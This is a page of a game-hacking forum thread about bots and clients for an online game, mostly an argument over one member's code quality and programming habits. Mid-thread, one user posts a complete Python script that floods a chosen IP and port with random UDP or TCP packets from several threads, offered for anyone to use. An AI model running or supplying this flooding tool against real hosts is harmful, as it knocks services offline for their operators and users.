Page 2 of 4 FirstFirst 1234 LastLast
    Thanks
    Quote Originally Posted by hax3rman View Post

Hux is away, and no one else is on to approve.
    They have lives unlike some of us.
    My was not why hux hasn't yet approved, it was it is NOT approved.... which is totally different.

Thanks
    My Mood
    Happy
    Quote Originally Posted by gorgor View Post
    My was not why hux hasn't yet approved, it was it is NOT approved.... which is totally different.
    You didn't read what I said.
    "Hux is away, and no one else is on to approve.
    They have lives unlike some of us."
    I constantly post OC on my tumblr: https://spaghetti-master.tumblr.com/

Info
    About me: I am the best there is.
    Add me on Skype if you are into autistic humor.

Previous name: Hax3rman

Links
    MPGH for dummies
    The rules of conduct.
    A playlist of awesome shit I find on youtube.

My current favorite song

Thanks
    It isn't being approved because of: incredibly shitty code.

Seriously ... learn to program yourselves and don't use the code of people who are as bad when it comes to coding as Botmaker. Google for tutorials on "object oriented coding", "code reuse", "encapsulation", etc. ...

If you want to learn how to repair a car you also try to learn from professionals and decent books and not from some random 14 year old who can not apply Ohm's law or who never used a torque wrench before. Just because the car "works" doesn't mean it does so safely or correctly ...
    Last edited by eth0nic; 05-13-2013 at 10:33 PM.

4. The Following 2 Users Say Thank You to eth0nic For This Useful Post:

dwdude (05-14-2013),Trapped (05-13-2013)

Thanks
    And again your negative, useless comments of fucking geek over-estimating himself...

You sound like a fucking teenager who spend all his time coding because he has no friend and trying to rule the board with cocky and sarcastic comments on others topics....

Your metaphor is stupid, didn't you learn to reproduce yourself without having to read books ?
    I learnt to fix my own car battery by trying myself and of course I leant to cook by looking someone else stuff not because I have to read it.

Stop commenting all the fucking time with you cocky style, waste your time on the zilllion of private-but-usless server topics spawning everyday on the forum and for which 0 programing is requiered ...

Thanks
    learnt to fix my own car battery by trying myself and of course I leant to cook by looking someone else stuff not because I have to read it.
    A car's battery is not a safety critical thing. Go weld the vehicle frame, go adjust the ignition timing or valves without actually reading a book or learning from a professional. Go rewire your ECU or replace your cars engine without knowledge.

Botmaker's code is horrible and you will learn only bad things from it. It got 10.000 lines of code in one single file, it is ugly, it does not follow the most basic rules of proper coding, etc. ... go stick with it but don't you ever ask us again why your code suddenly fails ... and don't you ever again blame your bugs on imaginary new game releases.

I am telling people not to learn bad things and bad habits but to learn it the proper way. But you guys seem to have a problem with objective criticism ... I never insulted anyone of you ... I never said anything personal ... but you go all super-rage-mode and berserk ... so it seems your ego is in your way ...

---------- Post added at 12:40 AM ---------- Previous post was at 12:38 AM ----------

And again your negative, useless comments of fucking geek over-estimating himself...
    My comments are only useless if you are a fucking ignorant fuck. If you read what I write and if you take some time to go through a few tutorials about how to actually code in the year 2013 then you will notice that it will safe you days and weeks of time and many headaches ... but you are not interested in learning anything you just want to throw together whatever works and ask lame ass questions every day.

---------- Post added at 12:53 AM ---------- Previous post was at 12:40 AM ----------

It is funny. If someone was about to build unstable houses or bridges or if someone sold broken cars you would criticize them yourself. If someone uploads the worst possible code you defend it because either you a) are a troll b) the uploader's buddy b) don't know it anything about programming at all? Also why are you posting in the tutorial section if you don't actually care to learn anything? A tutorial should provide meaningful information and not point out the worst possible way to do stuff ...

7. The Following User Says Thank You to eth0nic For This Useful Post:

Trapped (05-14-2013)

Thanks
    My Mood
    Amused
    Quote Originally Posted by eth0nic View Post
    A car's battery is not a safety critical thing. Go weld the vehicle frame, go adjust the ignition timing or valves without actually reading a book or learning from a professional. Go rewire your ECU or replace your cars engine without knowledge.

Botmaker's code is horrible and you will learn only bad things from it. It got 10.000 lines of code in one single file, it is ugly, it does not follow the most basic rules of proper coding, etc. ... go stick with it but don't you ever ask us again why your code suddenly fails ... and don't you ever again blame your bugs on imaginary new game releases.

I am telling people not to learn bad things and bad habits but to learn it the proper way. But you guys seem to have a problem with objective criticism ... I never insulted anyone of you ... I never said anything personal ... but you go all super-rage-mode and berserk ... so it seems your ego is in your way ...

---------- Post added at 12:40 AM ---------- Previous post was at 12:38 AM ----------

My comments are only useless if you are a fucking ignorant fuck. If you read what I write and if you take some time to go through a few tutorials about how to actually code in the year 2013 then you will notice that it will safe you days and weeks of time and many headaches ... but you are not interested in learning anything you just want to throw together whatever works and ask lame ass questions every day.

---------- Post added at 12:53 AM ---------- Previous post was at 12:40 AM ----------

It is funny. If someone was about to build unstable houses or bridges or if someone sold broken cars you would criticize them yourself. If someone uploads the worst possible code you defend it because either you a) are a troll b) the uploader's buddy b) don't know it anything about programming at all? Also why are you posting in the tutorial section if you don't actually care to learn anything? A tutorial should provide meaningful information and not point out the worst possible way to do stuff ...
    dude but you’ve been programming for how long did you say 20+ years
    And i bet your a professional software engineer with a college degree,
    My background is, I’ve been programming on and off for around 8 years, I’m a pure hobbyis and self taught!

Horrible code has you describe it is a personal opinion, personally I feel the same way about your crappy code, but I don’t go around harassing you on your threads and posts, you’ve basically written the same shit over and over reminding everyone how superior you are, compared to all of us “go fuck your self”

Your negative, aggressive, ignorant, to far up your own arse, why cant you get the message, I don’t want you posting in any of the threads I create or replying to my written posts.

You’re technical advise has been sound so far, but you’ve taught me nothing new, please just stop harassing me.

Frankly speaking
    I don’t care how the code looks so long as it's functioning correctly, this client is a personal project, intended for my use, with the added bonus, other's can use it and mess around with the source code if they want to.

In my defence the code is messy because I literally wrote the code from scratch in 5 days, it consist of around 2000 lines, and I spent no time on organizing the code!

why don’t you post one of your projects source code, to show us all how real programmers program, 2000 lines plus should be sufficient, I doubt you even have any useful functioning code for rotmg, alls I have seen is little bits and pieces you’ve copy and pasted, and your youtube videos! i want to see your code!

we should have our self’s a little competition to see who can produce a c++ client the fastest, why c++, Because there are no public domain c++ clients.
    create a separate thread stating the time zone and start date, first one to write a working client wins.

also you haven’t even seen this project source code, that says a lot about you!
    Last edited by Botmaker; 05-14-2013 at 06:55 AM.

9. The Following User Says Thank You to Botmaker For This Useful Post:

Alde. (02-11-2014)

Thanks
    My Mood
    Amused
    @Botmaker very nice code it may be kinda dirty and can be cleaned up some but works and does give a good starting base...

And that person you said with 20+ years programming I bet they don't even know what revision of C++ were on now in days or how a basic C# method should look using a base class<t>, or how a emun in C++ can be used in a emun C#... Basic stuff...

This is coming from me I am a retired US Military programmer and contractor for big company's :P

As for my background I have been doing software engineering since i was 5 years old i am 21 now

As for my ROTMG stand point i have the most stable server source now that has ran 3 days none stop holding 15 to 20 people spawning monsters without a crash :3
    @eth0nic you think you can code come play with the big boys at def-con or in IRC, we will chew you up and spit you out alive, Most of use have degrees or US Military Experience I did Anti-hacking (Cyber Command) for the US Army Since i was 17... Or come out and learn to write a basic program and release it open source? And have company's such as IMVU Inc pay you to write custom mobile, desktop, or management software cause you know what your doing. Honestly from how you post your knowledge is very far limited to what your trying to pass off to be.

If your so good as they all say lets see if you can solve what this following script does:
    Note I threw this together in 5 minutes free for anyone to use it needs python 2.7
    Code:
    from socket import socket, AF_INET, SOCK_DGRAM, SOCK_STREAM
    import sys
    import thread
    import threading
    from random import randint
    import string
    import random

def start(ip, port, thread, type):
        #return
        while 1:
            char_set = string.ascii_uppercase + string.digits
            length = randint(1,65500)
            data = random._urandom(length)

try:
                if type == "udp":
                    udp = socket(AF_INET,SOCK_DGRAM)
                    udp.sendto(data, (ip, int(port)))
                    print "0: Thread("+str(thread)+"): Sent data via UDP to IP: " + ip + ":" + port + " Data length: " + str(length)
                if type == "tcp":
                    sock = socket(AF_INET, SOCK_STREAM)
                    server_address = (ip, int(port))
                    sock.connect(server_address)
                    sock.sendall(data)
                    print "1: Thread("+str(thread)+"): Sent data via TCP to IP: " + ip + ":" + port + " Data length: " + str(length) 
            except:
                print str(type) + ": Thread("+str(thread)+") has encountered a error"
                #sock.close()

print "Created by Toyz... Leeching not allowed"

if len(sys.argv) != 5:
    	print("Usage: %s <Target IP> <Port> <Number of threads (1 - 10)> <TYPE tcp or udp>" % sys.argv[0])
    	sys.exit(1)

ip = sys.argv[1]
    port = sys.argv[2]
    send = sys.argv[3]
    type = sys.argv[4]

threads = []
    for x in range(int(send)):
        #print x
        #thread.start_new_thread(start(ip, port, x))
        t = threading.Thread(target=start, args=(ip,port,x,type,))
        threads.append(t)
        t.start()
    Last edited by Toyzz; 05-14-2013 at 06:14 AM.

Thanks

Each working source helps, why won't you dump your perl trade bot instead? If its such a great code.

Thanks
    Quote Originally Posted by bb1234bb View Post
    Each working source helps, why won't you dump your perl trade bot instead? If its such a great code.
    That is not true. If I post the wrong way of how to build a bridge it does not help. The bridge might be useable but insecure and unstable. You want to learn ways of how doing things efficiently and right. There are also wrong/right ways in software engineering ... the question is just whether you care or not.

Because it is not just a trade bot but an entire rotmg framework/API written in Perl. People would just mess up the entire game if they had an intuitive, easy to use and open-source interface to the game. So what I am trying to do is help people to write their own bots and proxies by providing some high level design stuff and by helping with specific problems I deem to be harder than the usual stuff.

Quote Originally Posted by Botmaker View Post
    dude but you’ve been programming for how long did you say 20+ years
    And i bet your a professional software engineer with a college degree,
    I have no degree at all. I have not even finished school ... i got hired by a company right away (back then I found it exciting to earn a lot of money ... today I wouldn't care at all). In the 90es that was usually how it happened. Companies needed skilled people and they would check your personal webpage ... see what projects were on there ... etc. ...

Today the entire IT market is totally different. The knowledge base has increased like a 1000 fold.

I just said that you would save yourself so much trouble if you spent a week learning about the concept of OO.

My background is, I’ve been programming on and off for around 8 years, I’m a pure hobbyis and self taught!
    And you haven't learned how to properly program in 8 years? Writing 10.000 lines monolithic code and reusing the same piece of low level code every 5 lines is not something a person with 8 years or programming experience should do.

Horrible code has you describe it is a personal opinion, personally I feel the same way about your crappy code, but I don’t go around harassing you on your threads and posts, you’ve basically written the same shit over and over reminding everyone how superior you are, compared to all of us “go fuck your self”
    There is no personal opinion about your code being horrible. 1 single file, 10.000 lines, the same low level stuff every 5th line, etc. ... it is just horrible. Please feel free to comment on my code ... I am always eager to improve it.

You’re technical advise has been sound so far, but you’ve taught me nothing new, please just stop harassing me.
    I suggested to read some tutorials on how to efficiently and cleanly code. There are literally hundreds out there. You will enjoy coding so much more. Your code will become way easier to read, maintain, improve and change. I am trying to help you. I can't give you any technical advise if your entire code is just a mess. That is why I gave you a meta-level advice.

Frankly speaking
    I don’t care how the code looks so long as it's functioning correctly, this client is a personal project, intended for my use, with the added bonus, other's can use it and mess around with the source code if they want to.
    Fair enough.

In my defence the code is messy because I literally wrote the code from scratch in 5 days, it consist of around 2000 lines, and I spent no time on organizing the code!
    We both know that is not the case. We both know that you have never written efficient code before. Nobody with 8 years of coding experience would write monolithic 10.000 lines code and re-use the same code in every 5th line ... that just does not happen ... no matter how little time you got. You always start writing OO code in that case automatically. You just feel when it is appropriate to make some code a method ... you know when to make something an object and which methods it might have. This is nothing personal. Just try it out and you will NEVER go back to procedural/monolithic coding when you are writing something that is more complicated than some basic script.

why don’t you post one of your projects source code, to show us all how real programmers program, 2000 lines plus should be sufficient, I doubt you even have any useful functioning code for rotmg, alls I have seen is little bits and pieces you’ve copy and pasted, and your youtube videos! i want to see your code!
    I will not share my code. It is an entire rotmg framework and people would fuck up the entire game if they had access to it. This is also the reason why other people obfuscate their code.

we should have our self’s a little competition to see who can produce a c++ client the fastest, why c++, Because there are no public domain c++ clients.
    create a separate thread stating the time zone and start date, first one to write a working client wins.

also you haven’t even seen this project source code, that says a lot about you!
    I am not interested in writing a client. I never was. I wrote the first proxy and the first bots but I never played the game. I am just here to donate a few 1000$ to non profit organizations ... sorry. I even stopped working on projectile projection/ray casting because it is not worth the time/effort. I'd rather focus on socioeconomic activism and AGI research and to educate people about those extremely important things for humanity.

I just wanted to save you much time and headache but I will no longer care. Let's just agree to disagree. Peace.
    Last edited by eth0nic; 05-14-2013 at 08:20 AM.

Thanks
    My Mood
    Amused

I have no degree at all. I have not even finished school ... i got hired by a company right away (back then I found it exciting to earn a lot of money ... today I wouldn't care at all). In the 90es that was usually how it happened. Companies needed skilled people and they would check your personal webpage ... see what projects were on there ... etc. ...

Today the entire IT market is totally different. The knowledge base has increased like a 1000 fold.

I just said that you would save yourself so much trouble if you spent a week learning about the concept of OO.
    Sounds like you have a interesting job history, college can offer a lot in terms of resource, I guess by not going down the college degree path you got a lot of experience working in the IT industry and a head start on your peers!

And you haven't learned how to properly program in 8 years? Writing 10.000 lines monolithic code and reusing the same piece of low level code every 5 lines is not something a person with 8 years or programming experience should do.
    I just always assume by writing a script to do a task, or solve a problem was all that was required, and I guess in my case that might be true, since I’m not working with anyone else!

There is no personal opinion about your code being horrible. 1 single file, 10.000 lines, the same low level stuff every 5th line, etc. ... it is just horrible. Please feel free to comment on my code ... I am always eager to improve it.

I suggested to read some tutorials on how to efficiently and cleanly code. There are literally hundreds out there. You will enjoy coding so much more. Your code will become way easier to read, maintain, improve and change. I am trying to help you. I can't give you any technical advise if your entire code is just a mess. That is why I gave you a meta-level advice.
    I’ve been reading some of your threads and posts about rotmg underlying mechanic and have found no issue with your code.

My goal is to learn as much as possible about electronics, programming, maths, physics, science
    I have literally 100s of books on programming, maths, AI, compiles, x86, OS design, basically a very long list of cool books,
    I find all these subjects highly interesting

We both know that is not the case. We both know that you have never written efficient code before. Nobody with 8 years of coding experience would write monolithic 10.000 lines code and re-use the same code in every 5th line ... that just does not happen ... no matter how little time you got. You always start writing OO code in that case automatically. You just feel when it is appropriate to make some code a method ... you know when to make something an object and which methods it might have. This is nothing personal. Just try it out and you will NEVER go back to procedural/monolithic coding when you are writing something that is more complicated than some basic script.
    Unfortunately I haven’t been in a educational environment and therefore have made my own choices when it comes to programming practices, all my projects are based on the same one huge file method.
    Teaching my self how to program as produced some really bad programming practices ill admit to that, but I will continue using this method because it’s how I learn to code!

I will not share my code. It is an entire rotmg framework and people would fuck up the entire game if they had access to it. This is also the reason why other people obfuscate their code.
    Fine!

I am not interested in writing a client. I never was. I wrote the first proxy and the first bots but I never played the game. I am just here to donate a few 1000$ to non profit organizations ... sorry. I even stopped working on projectile projection/ray casting because it is not worth the time/effort. I'd rather focus on socioeconomic activism and AGI research and to educate people about those extremely important things for humanity.

I just wanted to save you much time and headache but I will no longer care. Let's just agree to disagree. Peace.
    I like electronics but mostly the none analog parts, also i have written a digital logic simulator with various components, logic gates JK-flip-flop, Full adder, Decoders, Drivers, Seven Segment display and its open source

I’m not sure what that acronyms is without searching for it first, but good luck and hopefully you can help the human race somewhat with your endeavors.
    Last edited by Botmaker; 05-14-2013 at 09:25 AM.

Thanks
    My goal is to learn as much as possible about electronics, programming, maths, physics, science
    I have literally 100s of books on programming, maths, AI, compiles, x86, OS design, basically a very long list of cool books,
    I find all these subjects highly interesting
    There are 2 books I highly recommend to everyone ... they can change your world view dramatically.

"A Cosmist Manifesto" by Ben Goertzel
    https://goertzel.org/CosmistManifesto_July2010.pdf

and

"Sacred Economics" by Charles Eisenstein
    Sacred Economics | Charles Eisenstein | Money, Gift and Society in the Age of Transition.

both are free. Read a few pages of them ... you will never see technology or our society the same way again - promised! ;-)

Teaching my self how to program as produced some really bad programming practices ill admit to that, but I will continue using this method because it’s how I learn to code!
    The transition isn't that hard. As said ... you will spend a few hours learning the OO concept and to think in terms of objects and methods and your entire coding experience will improve. Back when I wrote QBasic code I did the same as you but I never wanted to deal with >1000 lines of code in any given file. I spent 2-3 days writing some basic OO code and ever since I never went back to procedural/monolithic code. Your character is an object, your inventory is an object, other players are objects, etc. ... it is just so much more intuitive to do $myself->getPosition and $myself->getName then to deal with raw data structures. :-) Also when you switch from a single file to OO style you should get a nice IDE with full syntax highlighting for your language ... i.e. it should enable you to jump to the declaration and initialization of functions and variables, etc. ... you navigate through your code so much faster and your main code will be free of low level stuff ... you will just do $move->position($myself->pos); or something instead of 50 lines of code.

I’m not sure what that acronyms is without searching for it first, but good luck and hopefully you can help the human race somewhat with your endeavors.
    AGI stands for artificial general intelligence. We are working on creating the first "true" AI system. It will likely change everything. Poverty, war, death, etc. could be things of the past within a few decades (something which socioeconomic activism sadly failed to achieve in a 100 years) ... see OpenCog Foundation | Building better minds together :-) The book written by Ben Goertzel I linked earlier also deals with those aspects.
    Last edited by eth0nic; 05-14-2013 at 09:48 AM.

Thanks
    eth0nic
    I hope you recognize you have been too far, and should chill now
    right ?

Thanks
    My Mood
    Lurking
    @Hux it looks like this thread got lost, any chance it could be approved?

Thanks
    My Mood
    Amused
    @eth0nic Proof or it never happened, even one file from your soo called framework is enough proof but you failt to produce thus making your logic flawed until proven true.

I already know as soon as my new base is finished with works on 13.2 I will most likely release open source to this community and on my personal ******

Thanks
    see is i can do anything about this stuff

Page 2 of 4 FirstFirst 1234 LastLast